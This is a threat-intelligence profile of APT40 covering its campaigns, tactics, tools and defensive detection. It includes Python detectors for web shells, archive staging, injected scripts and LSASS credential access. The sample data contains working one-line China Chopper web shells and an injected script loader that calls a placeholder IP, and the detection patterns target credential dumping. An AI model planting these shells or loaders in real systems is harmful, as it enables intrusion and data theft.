Background
APT40 is a Chinese state-sponsored cyber espionage group that has been active since at least 2009, with operations attributed to the Hainan State Security Department (HSSD), a provincial arm of China's Ministry of State Security (MSS). In July 2021, the U.S. Department of Justice unsealed an indictment of four Chinese nationals -- three MSS officers and one contract hacker -- for APT40's campaigns, providing an unusually detailed picture of how the PRC organizes its cyber operations. The indictment named Ding Xiaoyang, Cheng Qingmin, and Zhu Yunmin as MSS officers who directed operations from the HSSD in Haikou, Hainan Province, and Wu Shurong as the contract hacker who created malware, conducted intrusions, and supervised other hackers under their direction.
APT40's primary intelligence collection focus has historically been maritime affairs, defense technology, and regional geopolitics, reflecting China's strategic interests in the South China Sea and its broader naval modernization ambitions. The group targets organizations possessing naval technologies, autonomous underwater vehicle designs, submarine communications, and maritime engineering data. Beyond defense, APT40 has expanded its targeting to include government entities, universities, and research institutions in countries across Southeast Asia, the United States, Europe, and Australia.
The group operates using a network of front companies in Hainan Province that recruit hackers from local universities and provide cover for operations. According to the DOJ indictment, the MSS officers created front companies -- including Hainan Xiandun Technology Development Co. -- which were used to hire technical staff who carried out hacking operations under MSS direction. This model of using civilian contractors for state-sponsored operations is common across Chinese intelligence services and complicates attribution efforts.
Notable Campaigns
South China Sea Espionage (2013-2018): APT40 conducted sustained intelligence collection campaigns against governments, military organizations, and maritime companies involved in South China Sea territorial disputes. Targets included the Philippines, Malaysia, Cambodia, and Vietnam, as well as research institutions studying maritime policy. The group sought information on naval capabilities, diplomatic positions, and territorial claims.
U.S. Defense and Maritime Technology Theft (2011-2018): Over roughly seven years, APT40 systematically targeted U.S. defense contractors, universities conducting defense research, and maritime technology firms. The group stole sensitive data related to naval propulsion, autonomous underwater vehicles, submarine sensors, and advanced materials. The DOJ indictment documented theft from organizations in the United States, Austria, Cambodia, Canada, Germany, Indonesia, Malaysia, Norway, Saudi Arabia, South Africa, Switzerland, and the United Kingdom.
Cambodian Election Targeting (2018): In the lead-up to Cambodia's 2018 general elections, APT40 compromised Cambodian government entities, election commissions, media outlets, and opposition figures. The campaign appeared aimed at collecting intelligence on the election process and political dynamics, reflecting China's interest in maintaining favorable political relationships in the region.
Australian Government and Critical Infrastructure (2024): In July 2024 the Australian Signals Directorate (ASD), together with partner agencies from the United States, the United Kingdom, Canada, New Zealand, Germany, Japan, and South Korea, released a detailed advisory attributing intrusions into Australian government networks and critical infrastructure to APT40. The advisory was notable for documenting APT40's evolution toward exploiting SOHO devices as operational relay infrastructure, a technique previously most associated with Volt Typhoon, and for two case studies that walk through specific intrusions with timelines.
COVID-19 Research Targeting (2020): During the early months of the pandemic, APT40 was identified targeting pharmaceutical companies, medical research institutions, and universities involved in COVID-19 vaccine development and public health response. The campaign aligned with broader PRC-directed efforts to collect intelligence on vaccine research and pandemic response strategies.
Tactics, Techniques & Procedures
APT40 is notable for its rapid adoption of newly disclosed vulnerabilities in public-facing infrastructure. The July 2024 ASD advisory highlighted that the group adapts public proof-of-concept exploits for new vulnerabilities and uses them against targets within hours or days of release, citing widely deployed software such as Log4j, Atlassian Confluence, and Microsoft Exchange. The advisory also observed that APT40 appears to prefer exploiting vulnerable public-facing infrastructure over techniques that require user interaction, such as phishing. The group continues to find success with long-patched vulnerabilities dating back to 2017 on neglected or end-of-life edge devices, so rapid patching of new CVEs does not remove exposure while legacy systems remain unpatched.
For initial access, APT40 employs a combination of vulnerability exploitation and social engineering. The group conducts well-crafted spear-phishing campaigns using lure documents themed around maritime affairs, defense conferences, academic research, and regional geopolitics. They also deploy the ScanBox reconnaissance framework on compromised websites to profile visitors and identify high-value targets for follow-on exploitation.
Post-compromise, APT40 deploys web shells -- frequently China Chopper variants -- on the exploited service and establishes multiple persistence mechanisms so that access survives the discovery of any single foothold. The group uses a mix of custom and shared tools for credential harvesting, including Mimikatz and its custom HOMEFRY password dumper and cracker. Lateral movement relies heavily on RDP, valid credentials, and scheduled tasks.
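The web-shell foothold described above is one of the few APT40 artifacts a defender can look for on disk. The following Python script is an added example written for this page, not tooling from APT40 or from the cited advisories: it sweeps a web root for the classic one-line China Chopper server components (the PHP `eval($_POST[...])`, ASPX JScript `eval(Request.Item[...], "unsafe")`, and classic ASP `eval request(...)` forms). The signature set, the extension list, and the planted sample files are all constructed for the example.

```python
import os
import re
import tempfile

# Regexes for the classic one-line China Chopper server components.
# These are example signatures written for this page, not published IOCs.
SHELL_SIGNATURES = {
    "php_eval_request": re.compile(
        r"@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.IGNORECASE),
    "aspx_jscript_eval_unsafe": re.compile(
        r"eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*[\"']unsafe[\"']", re.IGNORECASE),
    "asp_vbscript_eval_request": re.compile(
        r"\b(?:eval|execute)\s*\(?\s*request\s*\(", re.IGNORECASE),
}

# Only server-side script types are scanned; binaries and static assets are skipped.
WEB_EXTENSIONS = {".php", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}


def scan_content(text):
    """Return the sorted names of every signature that matches a file body."""
    return sorted(name for name, rx in SHELL_SIGNATURES.items() if rx.search(text))


def scan_webroot(root):
    """Walk a web root and map each suspicious file (relative path) to its hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                matched = scan_content(fh.read())
            if matched:
                hits[os.path.relpath(path, root)] = matched
    return hits


# Constructed sample web root: a benign page, two planted shells, one static asset.
SAMPLE_FILES = {
    "index.php": "<?php echo htmlspecialchars($_POST['name']); ?>",
    "uploads/cache.php": "<?php @eval($_POST['password']);?>",
    "aspnet_client/x.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "img/logo.png": "not web code",
}


def demo():
    """Materialise the sample web root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(root)


if __name__ == "__main__":
    for path, sigs in sorted(demo().items()):
        print(f"{path}: {', '.join(sigs)}")
```

Run it against a real web root by calling `scan_webroot("/var/www")`; because China Chopper's server side is tiny and easily obfuscated, treat this as a first-pass sweep and pair it with file-integrity monitoring of the web directories rather than relying on the regexes alone.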
A significant evolution in APT40's tradecraft has been its adoption of compromised SOHO routers and other small office equipment as operational relay boxes (ORBs). By routing traffic through compromised devices in the target's geographic region, the group makes its traffic appear to originate from legitimate local IP addresses, complicating detection and attribution. Because these devices are typically unpatched or end-of-life consumer equipment inside the victim's own country, geographic blocking and IP reputation alone offer little protection against this traffic.
Data staging and exfiltration follow established patterns: files of interest are collected and compressed (often using RAR with password protection) in staging directories before being exfiltrated over encrypted channels to attacker-controlled infrastructure.
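The staging pattern described above leaves a recognisable trace in process-creation telemetry: an archiver run with a password switch, writing into a rarely inspected directory, often launched from the process tree of a web shell. The following Python example is added here and is not from the page's sources or any vendor product. It scores records shaped like Sysmon Event ID 1 (Image, CommandLine, ParentImage); the field shape, the archiver and staging-directory lists, and the three sample events are assumptions constructed for the example.

```python
import ntpath
import re

# Archiver binaries commonly used for staging; matched case-insensitively on basename.
ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe", "7za.exe"}
# RAR and 7-Zip password switches: -p<pwd> encrypts contents, -hp<pwd> also encrypts
# headers so the file names inside the archive are hidden from triage.
PASSWORD_SWITCH = re.compile(r"(?:^|\s)-(?:hp|p)\S*", re.IGNORECASE)
# Writable, rarely inspected locations frequently used as staging directories (assumption).
STAGING_DIRS = ("\\windows\\temp\\", "\\programdata\\", "\\users\\public\\",
                "\\perflogs\\", "\\$recycle.bin\\")
# Parents that indicate the archiver was launched from a web server worker, i.e. a web shell.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat9.exe", "java.exe"}


def inspect_process_event(event):
    """Return the list of suspicious traits found in one process-creation event.

    `event` is a dict mirroring Sysmon Event ID 1 fields (Image, CommandLine,
    ParentImage); the shape is a constructed assumption for this example.
    """
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if image not in ARCHIVERS:
        return reasons
    reasons.append("archiver")
    if PASSWORD_SWITCH.search(cmd):
        reasons.append("password_protected_archive")
    if any(d in cmd.lower() for d in STAGING_DIRS):
        reasons.append("staging_directory")
    if parent in WEB_SERVER_PARENTS:
        reasons.append("spawned_by_web_server")
    return reasons


def find_staging(events, min_traits=2):
    """(index, reasons) for events showing an archiver plus at least one more trait."""
    results = []
    for idx, ev in enumerate(events):
        reasons = inspect_process_event(ev)
        if len(reasons) >= min_traits:
            results.append((idx, reasons))
    return results


# Constructed sample telemetry: one staging run launched from a web shell under IIS,
# one ordinary user archiving a document, one unrelated process.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\WinRAR\Rar.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'Rar.exe a -hpS3cretKey -m5 -v100m C:\Windows\Temp\db.rar "D:\Shares\Engineering\*.pdf"'},
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\WinRAR.exe" a C:\Users\alice\Documents\report.rar C:\Users\alice\Documents\report.docx'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

if __name__ == "__main__":
    for idx, reasons in find_staging(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

Requiring two traits keeps a user who simply zips a document from paging an analyst, while an archiver with a password switch writing into a temp directory, or any archiver spawned by a web server worker, is surfaced. Renamed archiver binaries evade the basename check; correlate with the original file name or file hash in environments where that field is available.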
Tools & Malware
- ScanBox -- A JavaScript-based reconnaissance framework deployed on compromised websites to profile visitors, collecting browser type, OS, IP address, installed plugins, and keystrokes. Used to identify high-value targets for follow-on attacks.
- BADFLICK -- A backdoor capable of modifying the file system, generating a reverse shell, and modifying its own C2 configuration.
- AIRBREAK (also reported as Orz) -- A JavaScript-based backdoor, delivered via spear-phishing, that retrieves its commands from hidden strings in compromised web pages and from actor-controlled profiles on legitimate services, so its traffic blends with ordinary web browsing.
- FRESHAIR -- A minimal backdoor designed for initial triage, determining whether a compromised system warrants deployment of more capable implants.
- HOMEFRY -- A 64-bit Windows password cracker and credential dumping tool used to extract cached and stored credentials from compromised systems.
- MURKYTOP -- A command-line reconnaissance tool that performs network and system enumeration, identifying domain controllers, network shares, and user accounts.
- Derusbi (tracked by FireEye as PHOTO) -- A sophisticated DLL backdoor with multiple variants (client-side and server-side) providing comprehensive remote access capabilities. Shared across several Chinese APT groups.
- NanHaiShu -- A remote access trojan named for its association with South China Sea (Nanhai) espionage operations. Communicates via HTTP and provides standard backdoor capabilities.
- SoftEther VPN -- A legitimate open-source VPN tool repurposed by APT40 to create encrypted tunnels for persistent access and data exfiltration, blending in with normal VPN traffic.
- China Chopper -- A lightweight, widely used web shell that provides file management, command execution, and database access through a simple client-server architecture.
- Cobalt Strike -- Commercial adversary simulation framework used with custom configurations for post-exploitation operations.
Indicators & Detection
Vulnerability Window Monitoring: APT40's ability to exploit vulnerabilities within hours of disclosure demands that organizations have robust vulnerability intelligence and rapid response capabilities. Maintain real-time feeds from CISA KEV, vendor advisories, and threat intelligence providers. Prioritize patching of internet-facing systems and have pre-planned mitigations (WAF rules, network segmentation, service disabling) ready for situations where immediate patching is not possible.
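Both the rapid-exploitation observation in the TTP section and the vulnerability window monitoring point above come down to one operational question: when a new entry lands in CISA KEV, which of our exposed assets does it touch, and how much time is left. The following Python example is added here and is not from the page's sources. It joins an excerpt in the shape of the KEV JSON feed (`vulnerabilities[]` with `cveID`, `vendorProject`, `product`, `dateAdded`, `dueDate`) to a small asset inventory and ranks the results with internet-facing systems first. The CVE identifiers are real and well known (Log4Shell, the Confluence OGNL injection, and ProxyLogon), but the dates and other field values in the excerpt, the asset inventory, and the matching rules are placeholders constructed for this example rather than values from the live feed.

```python
import json
from datetime import date

# Constructed excerpt mirroring the CISA KEV JSON schema. CVE IDs are real; the
# date and description values are illustrative placeholders, not the live catalog.
KEV_SAMPLE = json.loads("""
{
  "catalogVersion": "example",
  "vulnerabilities": [
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
     "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
     "dateAdded": "2021-12-10", "dueDate": "2021-12-24", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2022-26134", "vendorProject": "Atlassian", "product": "Confluence Server and Data Center",
     "vulnerabilityName": "Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability",
     "dateAdded": "2022-06-02", "dueDate": "2022-06-06", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2021-26855", "vendorProject": "Microsoft", "product": "Exchange Server",
     "vulnerabilityName": "Microsoft Exchange Server Remote Code Execution Vulnerability",
     "dateAdded": "2021-11-03", "dueDate": "2021-04-16", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2019-0708", "vendorProject": "Microsoft", "product": "Remote Desktop Services",
     "vulnerabilityName": "Microsoft Remote Desktop Services Remote Code Execution Vulnerability",
     "dateAdded": "2021-11-03", "dueDate": "2022-05-03", "knownRansomwareCampaignUse": "Known"}
  ]
}
""")

# Constructed asset inventory: host, vendor, product, and whether it is reachable from the internet.
ASSETS = [
    {"host": "wiki01", "vendor": "Atlassian", "product": "Confluence Server", "internet_facing": True},
    {"host": "mail01", "vendor": "Microsoft", "product": "Exchange Server", "internet_facing": True},
    {"host": "build02", "vendor": "Apache", "product": "Log4j2", "internet_facing": False},
    {"host": "ts01", "vendor": "Microsoft", "product": "Remote Desktop Services", "internet_facing": False},
    {"host": "db01", "vendor": "PostgreSQL", "product": "PostgreSQL", "internet_facing": False},
]


def normalize(text):
    """Lower-case and collapse whitespace so vendor/product strings compare loosely."""
    return " ".join(text.lower().split())


def match_kev(kev, assets, today):
    """Join KEV entries to assets; return action items, most urgent first.

    A match requires the same vendor and either an identical product string or the
    asset's product being a substring of the KEV product (e.g. "Confluence Server"
    within "Confluence Server and Data Center"). That rule is a simplification.
    """
    items = []
    for vuln in kev["vulnerabilities"]:
        v_vendor, v_product = normalize(vuln["vendorProject"]), normalize(vuln["product"])
        due = date.fromisoformat(vuln["dueDate"])
        for asset in assets:
            if normalize(asset["vendor"]) != v_vendor:
                continue
            a_product = normalize(asset["product"])
            if a_product != v_product and a_product not in v_product:
                continue
            items.append({
                "host": asset["host"],
                "cve": vuln["cveID"],
                "internet_facing": asset["internet_facing"],
                "days_until_due": (due - today).days,
                "overdue": due < today,
            })
    # Exposed systems first, since edge services are what gets exploited within hours
    # of disclosure; within each group, the most overdue or soonest-due item first.
    items.sort(key=lambda item: (not item["internet_facing"], item["days_until_due"]))
    return items


def demo(today=date(2022, 6, 3)):
    """Fixed 'today' so the ranking is deterministic for the sample data."""
    return match_kev(KEV_SAMPLE, ASSETS, today)


if __name__ == "__main__":
    for item in demo():
        exposure = "internet-facing" if item["internet_facing"] else "internal"
        state = "OVERDUE" if item["overdue"] else f"due in {item['days_until_due']}d"
        print(f"{item['host']:8} {item['cve']:16} {exposure:15} {state}")
```

In production, replace `KEV_SAMPLE` with the downloaded feed and `ASSETS` with an export from the CMDB or external attack surface scanner, and run it on every KEV update; the value is in the join, which turns a public list into a per-host work queue with the federal due date as a visible deadline.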
SOHO Device Hygiene: Because APT40 routes operations through compromised SOHO devices in the victim's own region, geographic blocking and simple IP reputation are unreliable controls. Instead, monitor for traffic from residential or consumer ISP address ranges that reaches management interfaces, VPN concentrators, or sensitive internal systems, and for authentication events from such ranges by accounts that normally connect from corporate or cloud networks. Maintain firmware updates on all edge devices and replace end-of-life equipment, which can no longer be patched and is the pool from which ORB infrastructure is built.
ScanBox Detection: Monitor for JavaScript injection on organizational websites and partner portals. Implement Content Security Policy headers that restrict script execution to known sources, and alert on CSP violation reports. Review page templates and web server logs for script tags that reference hosts outside your inventory, inline scripts that were not deployed by your own release process, and client-side requests to third-party hosts that appear after a deployment you did not make.
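The two controls above, spotting injected script and constraining it with CSP, can be driven from the same inventory of approved scripts. The following Python example is added here and is not from the page's sources: it parses a page with the standard library HTML parser, compares every external script origin against an allowlist and every inline script against the SHA-256 hashes of the inline scripts you actually shipped, and emits the `script-src` header that would block anything else. The allowlist, the known inline script, and the sample page (including the injected loader pointing at a TEST-NET address) are constructed for the example.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []          # start buffering an inline script body

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def csp_hash(script_body):
    """CSP source expression 'sha256-<base64>' for an inline script body (exact bytes)."""
    digest = hashlib.sha256(script_body.encode("utf-8")).digest()
    return "'sha256-" + base64.b64encode(digest).decode("ascii") + "'"


def origin_of(src):
    """scheme://host[:port] of an absolute URL, or 'self' for a relative path."""
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" if parts.netloc else "'self'"


def audit_page(html, allowed_origins, known_inline):
    """Return (finding_type, detail) pairs for scripts not in the approved inventory."""
    collector = ScriptCollector()
    collector.feed(html)
    allowed_hashes = {csp_hash(body) for body in known_inline}
    findings = []
    for src in collector.external:
        if origin_of(src) not in allowed_origins:
            findings.append(("unexpected_external_script", src))
    for body in collector.inline:
        if csp_hash(body) not in allowed_hashes:
            findings.append(("unexpected_inline_script", body.strip()[:60]))
    return findings


def build_csp(allowed_origins, known_inline):
    """script-src policy allowing only the approved origins and inline hashes."""
    sources = sorted(allowed_origins) + sorted(csp_hash(body) for body in known_inline)
    return "script-src " + " ".join(sources) + "; object-src 'none'; base-uri 'self'"


# Constructed approved inventory and a constructed page with two injected scripts.
ALLOWED_ORIGINS = {"'self'", "https://cdn.example.org"}
KNOWN_INLINE = ["window.siteConfig = {lang: 'en'};"]
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/vendor.js"></script>
<script>window.siteConfig = {lang: 'en'};</script>
<script src="https://203.0.113.10/i/scanbox.js"></script>
<script>var s=document.createElement('script');s.src='https://203.0.113.10/p/k.js';document.body.appendChild(s);</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_HTML, ALLOWED_ORIGINS, KNOWN_INLINE):
        print(f"{kind}: {detail}")
    print(build_csp(ALLOWED_ORIGINS, KNOWN_INLINE))
```

Run `audit_page` against the HTML your server actually returns (or the rendered DOM from a headless browser, since framework-generated inline scripts also need hashing), and deploy `build_csp`'s output first as `Content-Security-Policy-Report-Only` so violation reports reveal legitimate scripts you forgot before the policy is enforced.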
Spear-Phishing Defense: Given APT40's sophisticated lure creation, organizations in the defense, maritime, and research sectors should implement enhanced email security controls. Monitor for documents containing maritime or defense conference themes, deploy sandbox analysis for email attachments, and train personnel to recognize targeted social engineering.
Credential Monitoring: Deploy robust credential theft detection, including monitoring for LSASS access, SAM database queries, and Kerberos ticket manipulation. APT40's HOMEFRY tool targets cached credentials, so monitor for unexpected credential cache access patterns and enforce credential hygiene practices including regular rotation of service account passwords.
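The LSASS access monitoring recommended above is most often implemented on top of Sysmon Event ID 10 (ProcessAccess), which records the source process, the target, the granted access mask, and a call trace. The following Python example is added here and is not from the page's sources or from any vendor's rule set. It decodes the access mask with the standard Windows process access rights, alerts when a process outside a small allowlist obtains memory-read rights on `lsass.exe`, and flags call frames in unbacked memory ("UNKNOWN"), which is typical of reflectively loaded tooling. The allowlist and the JSON-lines sample records are constructed assumptions for the example; tune the allowlist to the security products actually deployed.

```python
import json
import ntpath

# Windows process access rights from winnt.h; reading LSASS memory needs PROCESS_VM_READ.
ACCESS_RIGHTS = {
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
# Any of these rights on LSASS is enough to read or tamper with credential material.
MEMORY_ACCESS_MASK = 0x0010 | 0x0020 | 0x0008

# Processes that legitimately open LSASS with memory access. This is an example
# allowlist, not a vetted one; match on full path in production, not basename.
ALLOWED_SOURCES = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe", "wmiprvse.exe"}


def decode_access(mask):
    """Human-readable right names set in an access mask, lowest bit first."""
    return [name for bit, name in sorted(ACCESS_RIGHTS.items()) if mask & bit]


def evaluate_access_event(event):
    """Return an alert dict for a suspicious LSASS handle, or None."""
    if ntpath.basename(event.get("TargetImage", "")).lower() != "lsass.exe":
        return None
    mask = int(event["GrantedAccess"], 16)
    if not mask & MEMORY_ACCESS_MASK:
        return None                      # query-only handles (e.g. Task Manager) are normal
    source = ntpath.basename(event.get("SourceImage", "")).lower()
    if source in ALLOWED_SOURCES:
        return None
    # Frames in unbacked memory suggest injected or reflectively loaded code.
    unbacked = "UNKNOWN" in event.get("CallTrace", "")
    return {
        "source": event["SourceImage"],
        "granted": hex(mask),
        "rights": decode_access(mask),
        "unbacked_call_frames": unbacked,
    }


def scan_jsonl(lines):
    """Run the LSASS rule over JSON-lines Sysmon records; return the alerts raised."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("EventID") != 10:
            continue
        alert = evaluate_access_event(event)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed Sysmon records as JSON lines (not real telemetry): Defender reading LSASS,
# a renamed binary in Temp reading LSASS from unbacked code, Task Manager querying it.
SAMPLE_LOG = r'''
{"EventID": 10, "SourceImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18\\MsMpEng.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d234|C:\\Windows\\System32\\KERNELBASE.dll+2bd3e"}
{"EventID": 10, "SourceImage": "C:\\Windows\\Temp\\svchost.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1410", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d234|UNKNOWN(000001F4B2A0C3E1)"}
{"EventID": 10, "SourceImage": "C:\\Windows\\system32\\taskmgr.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1000", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d234"}
{"EventID": 1, "Image": "C:\\Windows\\system32\\notepad.exe"}
'''

if __name__ == "__main__":
    for alert in scan_jsonl(SAMPLE_LOG.splitlines()):
        print(f"{alert['source']} opened lsass.exe with {alert['granted']} "
              f"({', '.join(alert['rights'])}); unbacked frames: {alert['unbacked_call_frames']}")
```

The mask check is what keeps the rule quiet: 0x1000 (query limited information) is requested constantly by ordinary software, while 0x1010 and 0x1410, the combinations seen from Mimikatz-style dumping, add PROCESS_VM_READ. On hosts with Credential Guard or RunAsPPL enabled, any successful VM_READ handle on LSASS from a non-allowlisted process deserves immediate triage.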
Network Segmentation: Implement strict network segmentation between systems containing sensitive maritime, defense, or research data and general-purpose networks. APT40's lateral movement patterns focus on identifying and accessing file servers and repositories containing high-value technical data.